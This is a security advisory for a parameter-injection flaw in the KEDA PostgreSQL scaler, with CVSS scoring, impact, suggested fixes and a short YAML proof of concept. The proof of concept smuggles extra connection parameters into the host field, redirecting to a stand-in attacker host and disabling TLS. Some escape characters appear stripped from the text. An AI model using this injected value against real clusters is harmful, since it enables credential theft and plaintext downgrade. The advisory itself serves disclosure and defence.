PT-2026-56307 · Go · Github.Com/Kedacore/Keda/V2

Published

2026-07-07

·

Updated

2026-07-07

·

CVE-2026-53572

CVSS v3.1

5.9

Medium

VectorAV:N/AC:H/PR:L/UI:N/S:U/C:H/I:L/A:N

Summary

pkg/scalers/postgresql scaler.go builds libpq-style connection strings by concatenating key=value pairs separated by spaces. Each tenant-controllable field (host, port, userName, dbName, sslmode) is passed through escapePostgreConnectionParameter:
go
func escapePostgreConnectionParameter(str string) string {
  if !strings.Contains(str, " ") {
    return str    // returned as-is for any non-space whitespace
  }
  str = strings.ReplaceAll(str, "'", "'")
  return fmt.Sprintf("'%s'", str)
}
The function only escapes when a literal space is present. Per libpq/pgx documentation, parameters are also separated by tabs, newlines, carriage returns, and form feeds, and backslashes are parsed inside quoted strings. Because those characters are not detected, a tenant-supplied value like mydbtsslmode=disablethost=attacker.example.com splits into additional key=value tokens when parsed by pgx, injecting attacker-controlled connection parameters.

Vulnerable code

pkg/scalers/postgresql scaler.go, lines 155–164 and 250–257.

Impact

Tenants with the ability to create a TriggerAuthentication or ScaledObject that populates any of host, port, userName, dbName, sslmode can:
  • Force sslmode=disable on a connection that the cluster owner intended to be TLS-only — silently downgrading to plaintext and enabling on-path MitM.
  • Redirect the connection to an attacker-controlled host (host=...) to steal the credentials the operator supplies via the password= keyword.
  • Append arbitrary libpq runtime parameters (options=, application name=, target session attrs=) to pivot behavior.
Note: the password parameter is appended last in buildConnArray, which limits but does not eliminate credential exfiltration — injected host= still redirects the subsequent password= keyword's target.

Proof of concept

yaml
triggers:
- type: postgresql
 metadata:
  host: "legit.db.svctsslmode=disablethost=attacker.example.com"
  port: "5432"
  userName: "keda"
  dbName: "metrics"
  sslmode: "require"
  query: "SELECT 1"
After escapePostgreConnectionParameter (no space → returned unchanged), the resulting connection string is parsed by pgx into parameters that include host=attacker.example.com and sslmode=disable.

Suggested fix

  • Escape / reject any ASCII whitespace (t, , r, f, v, space) and backslash.
  • Prefer the URI form (postgres://user:pass@host:port/db?sslmode=require) with proper URL-encoding.
  • Validate each field against an allow-list pattern before use.

Resources

Fix

SQL injection

Special Elements Injection

Found an issue in the description? Have something to add? Feel free to write us 👾

Weakness Enumeration

Related Identifiers

CVE-2026-53572
GHSA-6W3M-4HHP-775Q

Affected Products

Github.Com/Kedacore/Keda/V2